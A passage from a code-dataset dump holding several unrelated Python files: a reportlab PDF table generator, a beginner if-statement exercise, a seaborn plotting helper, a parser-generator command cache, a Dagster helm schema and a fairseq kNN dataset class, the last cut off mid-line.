]\n\n if self.training.session_type == '1':\n big_table.extend([\n mecctable_header_line_2[:7],\n mecctable_header_line_3[:12]\n ])\n\n mecc_table_style.extend([\n ('SPAN', (6, 1), (-1, 1)),\n ('BACKGROUND', (6, 1), (-1, 1), colors.lightgrey),\n ('BACKGROUND', (6, 2), (-1, 2), colors.lightgrey)\n ])\n\n col_width = [8.65*cm, 2.9*cm, 1.8*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 8.65*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm]\n else:\n big_table.extend([\n mecctable_header_line_2,\n mecctable_header_line_3\n ])\n\n mecc_table_style.extend([\n ('SPAN', (6, 1), (12, 1)),\n ('SPAN', (13, 1), (-1, 1)),\n ('BACKGROUND', (6, 1), (12, 1), colors.lightgrey),\n ('BACKGROUND', (6, 2), (12, 2), colors.lightgrey),\n ('BACKGROUND', (13, 1), (-1, 1), colors.grey),\n ('BACKGROUND', (13, 2), (-1, 2), colors.grey)\n ])\n\n col_width = [6*cm, 2.25*cm, 1.8*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 4*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm, 0.7*cm,\n 0.85*cm, 4*cm, 0.6*cm, 1.1*cm, 0.7*cm]\n else:\n mecctable_header_line_2.pop(1)\n mecctable_header_line_3.pop(1)\n if self.reference == 'without':\n mecctable_header_line_2.pop(1)\n mecctable_header_line_3.pop(1)\n\n mecc_table_style.extend([\n ('FACE', (0, 0), (3, 2), 'Helvetica-Bold'),\n ('FACE', (4, 0), (-1, 0), 'Helvetica-Bold'),\n ('TEXTCOLOR', (4, 0), (-1, 0), colors.white),\n ('SPAN', (0, 0), (3, 0)),\n ('SPAN', (4, 0), (-1, 0)),\n ('BACKGROUND', (4, 0), (-1, 0), colors.steelblue)\n ])\n\n big_table = [\n self.mecctable_header_line_1,\n ]\n\n if self.training.session_type == '1':\n big_table.extend([\n mecctable_header_line_2[:5],\n mecctable_header_line_3[:10]\n ])\n\n mecc_table_style.extend([\n ('SPAN', (4, 1), (-1, 1)),\n ('BACKGROUND', (4, 1), (-1, 1), colors.lightgrey),\n ('BACKGROUND', (4, 2), (-1, 2), colors.lightgrey)\n ])\n\n col_width = [11*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 11*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm]\n\n else:\n big_table.extend([\n mecctable_header_line_2,\n mecctable_header_line_3\n ])\n\n mecc_table_style.extend([\n ('SPAN', (4, 1), (10, 1)),\n ('SPAN', (11, 1), (-1, 1)),\n ('BACKGROUND', (4, 1), (10, 1), colors.lightgrey),\n ('BACKGROUND', (4, 2), (10, 2), colors.lightgrey),\n ('BACKGROUND', (11, 1), (-1, 1), colors.grey),\n ('BACKGROUND', (11, 2), (-1, 2), colors.grey)\n ])\n\n col_width = [7.35*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 5.35*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm, 0.7*cm,\n 0.85*cm, 5.35*cm, 0.6*cm, 1.1*cm, 0.7*cm]\n else:\n mecc_table_style.extend([\n ('FACE', (0, 0), (4, 2), 'Helvetica-Bold'),\n ('FACE', (6, 0), (-1, 0), 'Helvetica-Bold'),\n ('TEXTCOLOR', (5, 0), (-1, 0), colors.white),\n ('SPAN', (4, 1), (4, 2)),\n ('SPAN', (0, 0), (4, 0)),\n ('SPAN', (5, 0), (-1, 0)),\n ('BACKGROUND', (5, 0), (-1, 0), colors.steelblue)\n ])\n\n big_table = [\n self.mecctable_header_line_1,\n ]\n\n if self.training.session_type == '1':\n big_table.extend([\n mecctable_header_line_2[:7],\n mecctable_header_line_3[:12]\n ])\n\n mecc_table_style.extend([\n ('SPAN', (5, 1), (-1, 1)),\n ('BACKGROUND', (5, 1), (-1, 1), colors.lightgrey),\n ('BACKGROUND', (5, 2), (-1, 2), colors.lightgrey)\n ])\n\n col_width = [10.1*cm, 1.8*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 10.1*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm]\n else:\n big_table.extend([\n mecctable_header_line_2,\n mecctable_header_line_3\n ])\n\n mecc_table_style.extend([\n ('SPAN', (5, 1), (11, 1)),\n ('SPAN', (12, 1), (-1, 1)),\n ('BACKGROUND', (5, 1), (11, 1), colors.lightgrey),\n ('BACKGROUND', (5, 2), (11, 2), 
colors.lightgrey),\n ('BACKGROUND', (12, 1), (-1, 1), colors.grey),\n ('BACKGROUND', (12, 2), (-1, 2), colors.grey)\n ])\n\n col_width = [6.75*cm, 1.8*cm, 0.6*cm, 0.6*cm, 0.6*cm]\n width_exams = [0.85*cm, 4.75*cm, 0.6*cm, 1.1*cm, 0.6*cm, 0.7*cm, 0.7*cm,\n 0.85*cm, 4.75*cm, 0.6*cm, 1.1*cm, 0.7*cm]\n\n return col_width, width_exams, mecc_table_style, big_table\n\n def footer_watermark(self, canvas, doc):\n self.custom_watermark(canvas, doc)\n\n def custom_watermark(self, canvas, doc):\n \"\"\"\n Add a custom watermark\n \"\"\"\n canvas.saveState()\n canvas.setFont('Helvetica', 45)\n canvas.setFillGray(0.80)\n canvas.rotate(self.watermark_rotation)\n canvas.drawCentredString(\n self.watermark_position_x,\n self.watermark_position_y,\n self.watermark_string\n )\n canvas.restoreState()\n\n\nclass VerticalText(Flowable):\n '''\n Rotates a text in a table cell.\n '''\n\n def __init__(self, text):\n Flowable.__init__(self)\n self.text = text\n\n def draw(self):\n canvas = self.canv\n canvas.rotate(90)\n fs = canvas._fontsize\n canvas.translate(1, -fs / 1.2) # canvas._leading?\n canvas.drawString(0, 0, self.text)\n\n def wrap(self, aW, aH):\n canv = self.canv\n fn, fs = canv._fontname, canv._fontsize\n return canv._leading, 1 + canv.stringWidth(self.text, fn, fs)\n\n\nclass LandscapeLeftNumberedCanvas(canvas.Canvas):\n \"\"\"\n Canvas allowing to count pages\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n canvas.Canvas.__init__(self, *args, **kwargs)\n self._saved_page_states = []\n\n def showPage(self):\n self._saved_page_states.append(dict(self.__dict__))\n self._startPage()\n\n def save(self):\n \"\"\"add page info to each page (page x of y)\"\"\"\n num_pages = len(self._saved_page_states)\n for state in self._saved_page_states:\n self.__dict__.update(state)\n self.draw_page_number(num_pages)\n canvas.Canvas.showPage(self)\n canvas.Canvas.save(self)\n\n def draw_page_number(self, page_count, position_x=285, position_y=5):\n \"\"\"\n draw page number with custom format and position\n \"\"\"\n if page_count > 0:\n self.setFillGray(0.2)\n self.setFont(\"Helvetica\", 8)\n self.drawRightString(\n position_x * mm, position_y * mm, \"Page %d/%d\" %\n (self._pageNumber, page_count))\n","repo_name":"unistra/eva","sub_path":"mecc/apps/utils/documents_generator/models/preview_mecctable.py","file_name":"preview_mecctable.py","file_ext":"py","file_size_in_byte":32238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16473639394","text":"'Sunt conditi pe care le pui '\r\n\r\nis_male = True\r\nis_tall = True\r\nis_prost= False\r\nis_tampit= True\r\nif is_male or is_tall :\r\n print(\"you are a male or tall or both\")\r\n\r\nelse:\r\n print(\"you are not a male or tall\")\r\n\r\n\r\nif is_male and is_tall :\r\n print(\"you are a tall male \")\r\nelif is_male and not(is_tall):\r\n print(\"you are a short male\")\r\nelif is_male and not is_tall:\r\n print(\"you are a short male\")\r\nelse:\r\n print(\"you are not a male or tall\")\r\n\r\nif is_prost and is_tampit:\r\n print(\"PROSTULE\")\r\nelif is_tampit and not (is_prost) :\r\n print(\"cretinule\")\r\nelse:\r\n print(\"smekeritule\")","repo_name":"DragosBulumac/Exercises1","sub_path":"IF STATEMENTS.py","file_name":"IF STATEMENTS.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73598606247","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef pointplot(x, 
y, hue, ax, data, order, markers='o', linestyles='-', error=None):\n all_lines = data[hue].unique()\n colors = sns.color_palette('husl', all_lines.shape[0])\n for i_line, line in enumerate(all_lines):\n this_data = data[data[hue] == line]\n x_ax = []\n y_ax = []\n y_err = []\n for i_x, x_label in enumerate(order):\n if np.sum(this_data[x] == x_label):\n y_ax.append(this_data[this_data[x] == x_label][y].values[0])\n if error is not None:\n y_err.append(\n this_data[this_data[x] == x_label][error].values[0])\n x_ax.append(i_x)\n\n ax.plot(x_ax, y_ax, color=colors[i_line], marker=markers,\n linestyle=linestyles, linewidth=0.5, markersize=3, label=line)\n if error is not None:\n ax.errorbar(x_ax, y_ax, yerr=y_err, ecolor=colors[i_line], capsize=3, capthick=1, fmt='none')\n\n ax.set_xticks(np.arange(len(order)))\n ax.set_xticklabels(order)\n ax.legend()\n","repo_name":"fraimondo/sext","sub_path":"sext/pointplot_errbar.py","file_name":"pointplot_errbar.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9987048713","text":"# -*- coding: utf-8 -*-\n#! \\file ./doit/text/pgen/cache/__init__.py\n#! \\author Jiří Kučera, \n#! \\stamp 2016-08-05 13:27:09 (UTC+01:00, DST+01:00)\n#! \\project DoIt!: Tools and Libraries for Building DSLs\n#! \\license MIT\n#! \\version 0.0.0\n#! \\fdesc @pyfile.docstr\n#\n\"\"\"\\\nParser generators maintainer cache.\\\n\"\"\"\n\n__license__ = \"\"\"\\\nCopyright (c) 2014 - 2017 Jiří Kučera.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\\\n\"\"\"\n\nimport sys\nimport os\nimport importlib\n\nfrom doit.support.app.io import read_all, write_items\nfrom doit.text.pgen.builders.builder import Builder\n\nCACHE_DIR = os.path.dirname(os.path.realpath(__file__))\nCOMMANDS_CACHE = os.path.join(CACHE_DIR, 'commands')\nCOMMANDS_DIR = os.path.dirname(os.path.realpath(\n sys.modules[Builder.__module__].__file__\n))\nCOMMANDS_BASE = '.'.join(Builder.__module__.split('.')[:-1])\n\ndel Builder\ndel sys\n\ndef get_commands(dont_import = False):\n \"\"\"\n \"\"\"\n\n cache_raw_data = read_all(COMMANDS_CACHE)\n if cache_raw_data is None:\n return None\n cache_data = cache_raw_data.split('\\n')\n cache_data = [x.strip() for x in cache_data]\n cache_data = [x for x in cache_data if x]\n cache_data = [x.split(' ') for x in cache_data]\n cache_data = [[x for x in y if x] for y in cache_data]\n if not cache_data:\n return []\n length_set = dict([(len(x), 1) for x in cache_data])\n if len(length_set) != 1 or 2 not in length_set:\n return None\n cache_data = [(x[0].strip(), x[1].strip()) for x in cache_data]\n if dont_import:\n return cache_data\n importlib.invalidate_caches()\n commands = []\n try:\n for x in cache_data:\n m = importlib.import_module(\"%s.%s\" % x)\n if not m or not hasattr(m, 'get_command_class'):\n return None\n commands.append(m.get_command_class())\n except ImportError:\n return None\n return commands\n#-def\n\ndef add_command(name):\n \"\"\"\n \"\"\"\n\n command_file = os.path.join(COMMANDS_DIR, \"%s.py\" % name)\n if not os.path.exists(command_file) or not os.path.isfile(command_file):\n return False, \"File <%s> not found\" % command_file\n cache_data = get_commands(dont_import = True)\n if cache_data is None:\n return False, \"Can't read from cache <%s>\" % COMMANDS_CACHE\n if name in [x[1] for x in cache_data]:\n return False, \"Command/Builder `%s` has been already added\" % name\n cache_data.append((COMMANDS_BASE, name))\n if not write_items(COMMANDS_CACHE, cache_data, (lambda x: \"%s %s\\n\" % x)):\n return False, \"Can't write to cache <%s>\" % COMMANDS_CACHE\n return True, \"\"\n#-def\n","repo_name":"i386x/doit","sub_path":"doit/text/pgen/cache/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9882009487","text":"from enum import Enum\nfrom typing import Any, Dict, List, Optional, Union\n\nfrom pydantic import Extra\n\nfrom ...utils import kubernetes\nfrom ...utils.utils import BaseModel, ConfigurableClass, create_json_schema_conditionals\nfrom .config import IntSource\n\n\nclass RunCoordinatorType(str, Enum):\n QUEUED = \"QueuedRunCoordinator\"\n CUSTOM = \"CustomRunCoordinator\"\n\n\nclass TagConcurrencyLimitConfig(BaseModel):\n applyLimitPerUniqueValue: bool\n\n class Config:\n extra = Extra.forbid\n\n\nclass TagConcurrencyLimit(BaseModel):\n key: str\n value: Optional[Union[str, TagConcurrencyLimitConfig]]\n limit: int\n\n class Config:\n extra = Extra.forbid\n\n\nclass QueuedRunCoordinatorConfig(BaseModel):\n maxConcurrentRuns: Optional[IntSource]\n tagConcurrencyLimits: Optional[List[TagConcurrencyLimit]]\n dequeueIntervalSeconds: Optional[IntSource]\n dequeueNumWorkers: Optional[IntSource]\n dequeueUseThreads: 
Optional[bool]\n\n class Config:\n extra = Extra.forbid\n\n\nclass RunCoordinatorConfig(BaseModel):\n queuedRunCoordinator: Optional[QueuedRunCoordinatorConfig]\n customRunCoordinator: Optional[ConfigurableClass]\n\n\nclass RunCoordinator(BaseModel):\n enabled: bool\n type: RunCoordinatorType\n config: RunCoordinatorConfig\n\n class Config:\n extra = Extra.forbid\n schema_extra = {\n \"allOf\": create_json_schema_conditionals(\n {\n RunCoordinatorType.QUEUED: \"queuedRunCoordinator\",\n RunCoordinatorType.CUSTOM: \"customRunCoordinator\",\n }\n )\n }\n\n\nclass Sensors(BaseModel):\n useThreads: bool\n numWorkers: Optional[int]\n numSubmitWorkers: Optional[int]\n\n\nclass Schedules(BaseModel):\n useThreads: bool\n numWorkers: Optional[int]\n numSubmitWorkers: Optional[int]\n\n\nclass Daemon(BaseModel):\n enabled: bool\n image: kubernetes.Image\n runCoordinator: RunCoordinator\n heartbeatTolerance: int\n env: Union[Dict[str, str], List[kubernetes.EnvVar]]\n envConfigMaps: List[kubernetes.ConfigMapEnvSource]\n envSecrets: List[kubernetes.SecretEnvSource]\n deploymentLabels: Dict[str, str]\n labels: Dict[str, str]\n nodeSelector: kubernetes.NodeSelector\n affinity: kubernetes.Affinity\n tolerations: kubernetes.Tolerations\n podSecurityContext: kubernetes.PodSecurityContext\n securityContext: kubernetes.SecurityContext\n resources: kubernetes.Resources\n livenessProbe: kubernetes.LivenessProbe\n readinessProbe: kubernetes.ReadinessProbe\n startupProbe: kubernetes.StartupProbe\n annotations: kubernetes.Annotations\n runMonitoring: Dict[str, Any]\n runRetries: Dict[str, Any]\n sensors: Sensors\n schedules: Schedules\n schedulerName: Optional[str]\n volumeMounts: Optional[List[kubernetes.VolumeMount]]\n volumes: Optional[List[kubernetes.Volume]]\n\n class Config:\n extra = Extra.forbid\n","repo_name":"dagster-io/dagster","sub_path":"helm/dagster/schema/schema/charts/dagster/subschema/daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"18009866050","text":"\nimport logging\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom fairseq.data import FairseqDataset, data_utils, plasma_utils\n\n\nlogger = logging.getLogger(__name__)\n\ndef collate(\n samples,\n pad_idx,\n eos_idx,\n left_pad_source=True,\n left_pad_target=False,\n input_feeding=True,\n pad_to_length=None,\n pad_to_multiple=1,\n):\n if len(samples) == 0:\n return {}\n\n def merge(key, left_pad, move_eos_to_beginning=False, pad_to_length=None):\n if key == \"source\" or key == \"target\": \n return data_utils.collate_tokens(\n [s[key] for s in samples],\n pad_idx,\n eos_idx,\n left_pad,\n move_eos_to_beginning,\n pad_to_length=pad_to_length,\n pad_to_multiple=pad_to_multiple,\n )\n elif key == \"knntargets\":\n \"\"\"\n for key == \"knntargets\" or key == \"distances\",\n move_eos_to_beginning must be False\n \"\"\"\n values = [s[key] for s in samples]\n size = max(v.size(0) for v in values)\n size = size if pad_to_length is None else max(size, pad_to_length)\n if pad_to_multiple != 1 and size % pad_to_multiple != 0:\n size = int(((size - 0.1) // pad_to_multiple + 1) * pad_to_multiple)\n k = values[0].size(-1)\n for i in range(len(values)):\n values[i] = torch.cat([values[i].new(size - values[i].size(0), k).fill_(pad_idx),values[i]] if left_pad else [values[i], values[i].new(size - values[i].size(0), k).fill_(pad_idx)] , dim=0)\n return torch.stack(values)\n elif key == 
\"distances\":\n values = [s[key] for s in samples]\n size = max(v.size(0) for v in values)\n size = size if pad_to_length is None else max(size, pad_to_length)\n if pad_to_multiple != 1 and size % pad_to_multiple != 0:\n size = int(((size - 0.1) // pad_to_multiple + 1) * pad_to_multiple)\n k = values[0].size(-1)\n for i in range(len(values)):\n values[i] = torch.cat([values[i].new(size - values[i].size(0), k).fill_(5e4), values[i]] if left_pad else [values[i], values[i].new(size - values[i].size(0), k).fill_(5e4)], dim=0) # 5e4是接近于float16的最大值的数,直接用inf会报错\n return torch.stack(values)\n else:\n raise ValueError(\n \"Unsupported language modeling collate key: {}\".format(key)\n )\n def check_alignment(alignment, src_len, tgt_len):\n if alignment is None or len(alignment) == 0:\n return False\n if (\n alignment[:, 0].max().item() >= src_len - 1\n or alignment[:, 1].max().item() >= tgt_len - 1\n ):\n logger.warning(\"alignment size mismatch found, skipping alignment!\")\n return False\n return True\n\n def compute_alignment_weights(alignments):\n \"\"\"\n Given a tensor of shape [:, 2] containing the source-target indices\n corresponding to the alignments, a weight vector containing the\n inverse frequency of each target index is computed.\n For e.g. if alignments = [[5, 7], [2, 3], [1, 3], [4, 2]], then\n a tensor containing [1., 0.5, 0.5, 1] should be returned (since target\n index 3 is repeated twice)\n \"\"\"\n align_tgt = alignments[:, 1]\n _, align_tgt_i, align_tgt_c = torch.unique(\n align_tgt, return_inverse=True, return_counts=True\n )\n align_weights = align_tgt_c[align_tgt_i[np.arange(len(align_tgt))]]\n return 1.0 / align_weights.float()\n\n\n id = torch.LongTensor([s[\"id\"] for s in samples])\n src_tokens = merge(\n \"source\",\n left_pad=left_pad_source,\n pad_to_length=pad_to_length[\"source\"] if pad_to_length is not None else None,\n )\n # sort by descending source length\n src_lengths = torch.LongTensor(\n [s[\"source\"].ne(pad_idx).long().sum() for s in samples]\n )\n src_lengths, sort_order = src_lengths.sort(descending=True)\n id = id.index_select(0, sort_order)\n src_tokens = src_tokens.index_select(0, sort_order)\n prev_output_tokens = None\n target = None\n if samples[0].get(\"target\", None) is not None:\n target = merge(\n \"target\",\n left_pad=left_pad_target,\n pad_to_length=pad_to_length[\"target\"]\n if pad_to_length is not None\n else None,\n )\n target = target.index_select(0, sort_order)\n tgt_lengths = torch.LongTensor(\n [s[\"target\"].ne(pad_idx).long().sum() for s in samples]\n ).index_select(0, sort_order)\n\n if samples[0]['knntargets'] is not None:\n knntargets = merge('knntargets',\n left_pad=left_pad_target,\n pad_to_length=pad_to_length[\"target\"]\n if pad_to_length is not None\n else None,).index_select(0, sort_order)\n else:\n knntargets = None\n\n if samples[0]['distances'] is not None:\n distances = merge('distances',\n left_pad=left_pad_target,\n pad_to_length=pad_to_length[\"target\"]\n if pad_to_length is not None\n else None,).index_select(0, sort_order)\n else:\n distances = None\n \n ntokens = tgt_lengths.sum().item()\n if samples[0].get(\"prev_output_tokens\", None) is not None:\n prev_output_tokens = merge(\"prev_output_tokens\", left_pad=left_pad_target)\n elif input_feeding:\n # we create a shifted version of targets for feeding the\n # previous output token(s) into the next decoder step\n prev_output_tokens = merge(\n \"target\",\n left_pad=left_pad_target,\n move_eos_to_beginning=True,\n pad_to_length=pad_to_length[\"target\"]\n if 
pad_to_length is not None\n else None,\n )\n else:\n ntokens = src_lengths.sum().item()\n \n batch = {\n \"id\": id,\n \"nsentences\": len(samples),\n \"ntokens\": ntokens,\n \"net_input\": {\n \"src_tokens\": src_tokens,\n \"src_lengths\": src_lengths,\n },\n \"target\": target,\n \"knntargets\": knntargets,\n \"distances\": distances,\n }\n if prev_output_tokens is not None:\n batch[\"net_input\"][\"prev_output_tokens\"] = prev_output_tokens.index_select(\n 0, sort_order\n )\n if samples[0].get(\"alignment\", None) is not None:\n bsz, tgt_sz = batch[\"target\"].shape\n src_sz = batch[\"net_input\"][\"src_tokens\"].shape[1]\n\n offsets = torch.zeros((len(sort_order), 2), dtype=torch.long)\n offsets[:, 1] += torch.arange(len(sort_order), dtype=torch.long) * tgt_sz\n if left_pad_source:\n offsets[:, 0] += src_sz - src_lengths\n if left_pad_target:\n offsets[:, 1] += tgt_sz - tgt_lengths\n\n alignments = [\n alignment + offset\n for align_idx, offset, src_len, tgt_len in zip(\n sort_order, offsets, src_lengths, tgt_lengths\n )\n for alignment in [samples[align_idx][\"alignment\"].view(-1, 2)]\n if check_alignment(alignment, src_len, tgt_len)\n ]\n\n if len(alignments) > 0:\n alignments = torch.cat(alignments, dim=0)\n align_weights = compute_alignment_weights(alignments)\n\n batch[\"alignments\"] = alignments\n batch[\"align_weights\"] = align_weights\n\n if samples[0].get(\"constraints\", None) is not None:\n # Collate the packed constraints across the samples, padding to\n # the length of the longest sample.\n lens = [sample.get(\"constraints\").size(0) for sample in samples]\n max_len = max(lens)\n constraints = torch.zeros((len(samples), max(lens))).long()\n for i, sample in enumerate(samples):\n constraints[i, 0 : lens[i]] = samples[i].get(\"constraints\")\n batch[\"constraints\"] = constraints\n\n return batch\n\n\nclass LanguagePairWithKNNTargetsDataset(FairseqDataset):\n def __init__(\n self,\n src,\n src_sizes,\n src_dict,\n tgt=None,\n tgt_sizes=None,\n tgt_dict=None,\n knn_targets=None,\n knn_distances=None,\n left_pad_source=True,\n left_pad_target=False,\n shuffle=True,\n input_feeding=True,\n align_dataset=None,\n constraints=None,\n eos=None,\n num_buckets=0,\n src_lang_id=None,\n tgt_lang_id=None,\n pad_to_multiple=1,\n knn_k=8,\n ):\n if tgt_dict is not None:\n assert src_dict.pad() == tgt_dict.pad()\n assert src_dict.eos() == tgt_dict.eos()\n assert src_dict.unk() == tgt_dict.unk()\n if tgt is not None:\n assert len(src) == len(\n tgt\n ), \"Source and target must contain the same number of examples\"\n self.src = src\n self.tgt = tgt\n self.src_sizes = np.array(src_sizes, dtype=np.int)\n self.tgt_sizes = np.array(tgt_sizes, dtype=np.int) if tgt_sizes is not None else None\n self.sizes = (\n np.vstack((self.src_sizes, self.tgt_sizes)).T\n if self.tgt_sizes is not None\n else self.src_sizes\n )\n self.src_dict = src_dict\n self.tgt_dict = tgt_dict\n self.knn_targets = knn_targets\n self.knn_distances = knn_distances\n self.left_pad_source = left_pad_source\n self.left_pad_target = left_pad_target\n self.shuffle = shuffle\n self.input_feeding = input_feeding\n self.align_dataset = align_dataset\n if self.align_dataset is not None:\n assert (\n self.tgt_sizes is not None\n ), \"Both source and target needed when alignments are provided\"\n self.constraints = constraints\n self.eos = eos if eos is not None else src_dict.eos()\n self.src_lang_id = src_lang_id\n self.tgt_lang_id = tgt_lang_id\n # num_buckets always 0\n if num_buckets > 0:\n from fairseq.data import 
BucketPadLengthDataset\n self.src = BucketPadLengthDataset(\n self.src,\n sizes=self.src_sizes,\n num_buckets=num_buckets,\n pad_idx=self.src_dict.pad(),\n left_pad=self.left_pad_source,\n )\n self.src_sizes = self.src.sizes\n logger.info(\"bucketing source lengths: {}\".format(list(self.src.buckets)))\n if self.tgt is not None:\n self.tgt = BucketPadLengthDataset(\n self.tgt,\n sizes=self.tgt_sizes,\n num_buckets=num_buckets,\n pad_idx=self.tgt_dict.pad(),\n left_pad=self.left_pad_target,\n )\n self.tgt_sizes = self.tgt.sizes\n logger.info(\n \"bucketing target lengths: {}\".format(list(self.tgt.buckets))\n )\n\n # determine bucket sizes using self.num_tokens, which will return\n # the padded lengths (thanks to BucketPadLengthDataset)\n num_tokens = np.vectorize(self.num_tokens, otypes=[np.long])\n self.bucketed_num_tokens = num_tokens(np.arange(len(self.src)))\n self.buckets = [\n (None, num_tokens) for num_tokens in np.unique(self.bucketed_num_tokens)\n ]\n else:\n self.buckets = None\n\n self.pad_to_multiple = pad_to_multiple\n\n try:\n from fairseq.data.token_block_utils_fast import (\n _get_slice_indices_fast,\n _get_block_to_dataset_index_fast,\n )\n except ImportError:\n raise ImportError(\n 'Please build Cython components with: `pip install --editable .` '\n 'or `python setup.py build_ext --inplace`'\n )\n block_size = 0\n slice_indices = _get_slice_indices_fast(self.tgt_sizes, \"eos\", block_size, 1)\n self._slice_indices = plasma_utils.PlasmaArray(slice_indices)\n\n assert np.sum(self.tgt_sizes) == self.knn_distances.shape[0]\n self.knn_k = knn_k\n\n def get_batch_shapes(self):\n return self.buckets\n @property\n def slice_indices(self):\n return self._slice_indices.array\n def __getitem__(self, index):\n # print(\"index is : \", index)\n tgt_item = self.tgt[index] if self.tgt is not None else None\n src_item = self.src[index]\n # print(\"self.knn_targets[index] len is : \", len(self.knn_targets[index]))\n # print(\"tgt_item len is : \", len(tgt_item))\n slice_s, slice_e = self.slice_indices[index]\n # print(f\"slice_e - slice_s is : {slice_e - slice_s} ; slice_s is : {slice_s}; slice_e is : {slice_e} \")\n\n if self.knn_targets is not None:\n item_knntargets = torch.from_numpy(np.copy(self.knn_targets[slice_s: slice_e])[:, :self.knn_k]).type_as(tgt_item)\n else:\n item_knntargets = None\n \n if self.knn_distances is not None:\n item_distances = torch.from_numpy(np.copy(self.knn_distances[slice_s: slice_e])[:, :self.knn_k]).float()\n else:\n item_distances = None\n example = {\n \"id\": index,\n \"source\": src_item,\n \"target\": tgt_item,\n \"knntargets\": item_knntargets,\n \"distances\": item_distances,\n }\n if self.align_dataset is not None:\n example[\"alignment\"] = self.align_dataset[index]\n if self.constraints is not None:\n example[\"constraints\"] = self.constraints[index]\n return example\n \n def __len__(self):\n return len(self.src)\n def collater(self, samples, pad_to_length=None):\n \"\"\"Merge a list of samples to form a mini-batch.\n\n Args:\n samples (List[dict]): samples to collate\n pad_to_length (dict, optional): a dictionary of\n {'source': source_pad_to_length, 'target': target_pad_to_length}\n to indicate the max length to pad to in source and target respectively.\n\n Returns:\n dict: a mini-batch with the following keys:\n\n - `id` (LongTensor): example IDs in the original input order\n - `ntokens` (int): total number of tokens in the batch\n - `net_input` (dict): the input to the Model, containing keys:\n\n - `src_tokens` (LongTensor): a padded 2D 
Tensor of tokens in\n the source sentence of shape `(bsz, src_len)`. Padding will\n appear on the left if *left_pad_source* is ``True``.\n - `src_lengths` (LongTensor): 1D Tensor of the unpadded\n lengths of each source sentence of shape `(bsz)`\n - `prev_output_tokens` (LongTensor): a padded 2D Tensor of\n tokens in the target sentence, shifted right by one\n position for teacher forcing, of shape `(bsz, tgt_len)`.\n This key will not be present if *input_feeding* is\n ``False``. Padding will appear on the left if\n *left_pad_target* is ``True``.\n - `src_lang_id` (LongTensor): a long Tensor which contains source\n language IDs of each sample in the batch\n\n - `target` (LongTensor): a padded 2D Tensor of tokens in the\n target sentence of shape `(bsz, tgt_len)`. Padding will appear\n on the left if *left_pad_target* is ``True``.\n - `tgt_lang_id` (LongTensor): a long Tensor which contains target language\n IDs of each sample in the batch\n \"\"\"\n res = collate(\n samples,\n pad_idx=self.src_dict.pad(),\n eos_idx=self.eos,\n left_pad_source=self.left_pad_source,\n left_pad_target=self.left_pad_target,\n input_feeding=self.input_feeding,\n pad_to_length=pad_to_length,\n pad_to_multiple=self.pad_to_multiple,\n )\n if self.src_lang_id is not None or self.tgt_lang_id is not None:\n src_tokens = res[\"net_input\"][\"src_tokens\"]\n bsz = src_tokens.size(0)\n if self.src_lang_id is not None:\n res[\"net_input\"][\"src_lang_id\"] = (\n torch.LongTensor([[self.src_lang_id]]).expand(bsz, 1).to(src_tokens)\n )\n if self.tgt_lang_id is not None:\n res[\"tgt_lang_id\"] = (\n torch.LongTensor([[self.tgt_lang_id]]).expand(bsz, 1).to(src_tokens)\n )\n return res\n def num_tokens(self, index):\n \"\"\"Return the number of tokens in a sample. This value is used to\n enforce ``--max-tokens`` during batching.\"\"\"\n return max(\n self.src_sizes[index],\n self.tgt_sizes[index] if self.tgt_sizes is not None else 0,\n )\n\n def size(self, index):\n \"\"\"Return an example's size as a float or tuple. This value is used when\n filtering a dataset with ``--max-positions``.\"\"\"\n return (\n self.src_sizes[index],\n self.tgt_sizes[index] if self.tgt_sizes is not None else 0,\n )\n def ordered_indices(self):\n \"\"\"Return an ordered list of indices. Batches will be constructed based\n on this order.\"\"\"\n print(\"self.shuffle is : \", self.shuffle)\n if self.shuffle:\n indices = np.random.permutation(len(self)).astype(np.int64)\n else:\n indices = np.arange(len(self), dtype=np.int64)\n return indices\n @property\n def supports_prefetch(self):\n return getattr(self.src, \"supports_prefetch\", False) and 